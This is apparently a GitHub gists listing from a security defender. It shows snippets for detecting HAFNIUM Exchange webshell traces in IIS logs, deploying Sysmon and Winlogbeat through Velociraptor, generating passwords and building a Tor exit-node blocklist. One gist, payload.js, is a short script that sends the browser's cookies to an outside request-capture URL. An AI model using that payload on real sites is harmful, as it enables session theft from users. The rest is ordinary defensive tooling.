Skip to content

Instantly share code, notes, and snippets.

View gist:13386852fb80beac4561f2bed569095e
# Quick tip to find super common artifacts of the HAFNIUM Exchange attacks with nothing more than IIS logs...
# Run this grep pattern against all logs in C:\inetpub\logs\LogFiles\W3SVC1
#
# https://twitter.com/eric_capuano
# Quick check for likely successful attacks
## Bash (faster)
egrep -i '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log
## PowerShell
Select-String -Pattern '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log
View Eradication.ps1
# A script that will safely remove adversary footholds on systems.
#
# Be sure to replace your observables down below. Be careful not to
# included LOLBINs as they cannot be safely killed this way. Use
# Kill-Threads.ps1 for those.
#
# Used with great success during CF20
#
# Author: Eric Capuano
View Custom.Winlogbeat.Deploy.xml
name: Custom.Winlogbeat.Deploy
description: |
Quick and dirty way to deploy Winlogbeat via Velociraptor
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT
type: CLIENT
parameters:
- name: binaryURL
default: http://url.to/winlogbeat.exe
- name: installPath
default: C:\Program Files\winlogbeat
View Custom.CapsSysmon.Deploy.xml
name: Custom.CapsSysmon.Deploy
description: |
A quick and dirty way to download and install sysmon via Velociraptor
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT
type: CLIENT
parameters:
- name: sysmonURL
default: http://url.to/sysmon8_64.exe
- name: binPath
default: C:\sysmon.exe
@ecapuano
ecapuano / winlogontypes.csv
Created Jun 11, 2018
Lookup CSV for WinLogBeat decorations in Graylog
View winlogontypes.csv
id description
2 Interactive (logon at keyboard and screen of system)
3 Network (i.e. connection to shared folder on this computer from elsewhere on network)
4 Batch (i.e. scheduled task)
5 Service (Service startup)
7 Unlock (i.e. unlocking unnattended workstation)
8 NetworkCleartext (Logon with credentials sent in the clear text.)
9 NewCredentials such as with RunAs or mapping a network drive with alternate credentials.
10 RemoteInteractive (Terminal Services Remote Desktop or Remote Assistance)
11 CachedInteractive (logon with cached domain credentials)
@ecapuano
ecapuano / random.sh
Created May 16, 2016
Generate N random
View random.sh
# character set to use for generating passwords
chars=abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%
# how many passwords to generate
count=100
n=0
while [ $n -le $count ] ; do
for i in {1..12} ; do #### 12 defines the max size of the passwords
View payload.js
javascript:var img = document.createElement('img');
img.src = "http://requestb.in/zngmupzn?cookie=" + document.cookie;
View keybase.md

Keybase proof

I hereby claim:

  • I am ecapuano on github.
  • I am ecapuano (https://keybase.io/ecapuano) on keybase.
  • I have a public key whose fingerprint is 2033 7875 F286 D318 5746 A2A7 27D2 E47B 52A3 720B

To claim this, I am signing this object:

@ecapuano
ecapuano / getTORnodes.sh
Created Aug 25, 2015
Simple script for getting the latest list of TOR exit nodes and outputting them into a blocklist format, 1 exit node per line. Easily used as Dynamic Blocklist on Palo Alto Firewalls.
View getTORnodes.sh
#!/bin/bash
#
# Use 'crontab -e' to create a scheduled job for this. Every 6 hours or so should be good.
# Make sure your blocking software/hardware can access the tor_nodes.txt file via HTTP / FTP / SCP / etc...
#
curl https://check.torproject.org/exit-addresses | grep ExitAddress | cut -d' ' -f2 > /var/www/html/blocklists/tor_nodes.txt